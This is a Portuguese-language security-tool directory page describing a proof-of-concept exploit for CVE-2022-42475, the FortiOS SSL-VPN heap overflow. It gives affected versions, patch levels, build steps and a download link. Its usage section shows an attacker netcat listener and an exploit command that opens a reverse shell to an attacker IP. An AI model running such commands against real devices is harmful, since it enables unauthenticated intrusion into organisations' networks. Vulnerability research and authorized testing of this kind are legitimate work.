Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2022-42475-poc — Prova de Conceito (PoC) para pesquisa e validação controlada em laboratório da CVE-2022-42475, uma vulnerabilidade crítica de estouro de buffer baseado em heap que afeta o serviço SSL-VPN em determinadas versões do FortiOS. | Kitploit
Ferramentas/GitHubGitHub/ull0a/cve-2022-42475-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

Prova de Conceito (PoC) para pesquisa e validação controlada em laboratório da CVE-2022-42475, uma vulnerabilidade crítica de estouro de buffer baseado em heap que afeta o serviço SSL-VPN em determinadas versões do FortiOS.

Ver Repositório
1há 6h 32mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-42475 PoC

Execução Remota de Código Pré-Autenticação no SSL VPN da Fortinet

Descrição

CVE-2022-42475 é uma vulnerabilidade de heap-based buffer overflow no serviço SSL VPN do FortiOS que permite a atacantes não autenticados executar código arbitrário de forma remota (RCE) por meio de solicitações HTTP especialmente elaboradas direcionadas ao endpoint /remote/error.

Esta vulnerabilidade foi explorada ativamente na natureza (0-day) antes da publicação do patch oficial.

Execução do PoC

A captura a seguir mostra a execução do PoC em um ambiente de laboratório autorizado:

A saída mostra a execução do PoC e a interação com a instância do FortiOS utilizada para os testes.

Execução do PoC

Informações do CVE

CampoValor
CVE IDCVE-2022-42475
CVSS 3.19.3 (Crítica)
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
DescobertoDezembro de 2022
Patch oficialFortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

Versões Afetadas

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

Requisitos

  • Go 1.18+ (para compilar o PoC)
  • Acesso de rede ao alvo na porta 443 (ou porta SSL VPN configurada)
  • Ambiente de laboratório autorizado para realizar os testes

Compilação

root@kitploit:~
# Clonar ou baixar o código-fonte
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# Compilar
go build -o exploit exploit.go

# Ou executar diretamente
go run exploit.go <target> <port> <reverse_ip> <params>

Uso

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

Exemplo

root@kitploit:~
# No atacante, iniciar listener
nc -lvnp 80

# Executar o exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
Baixar ferramenta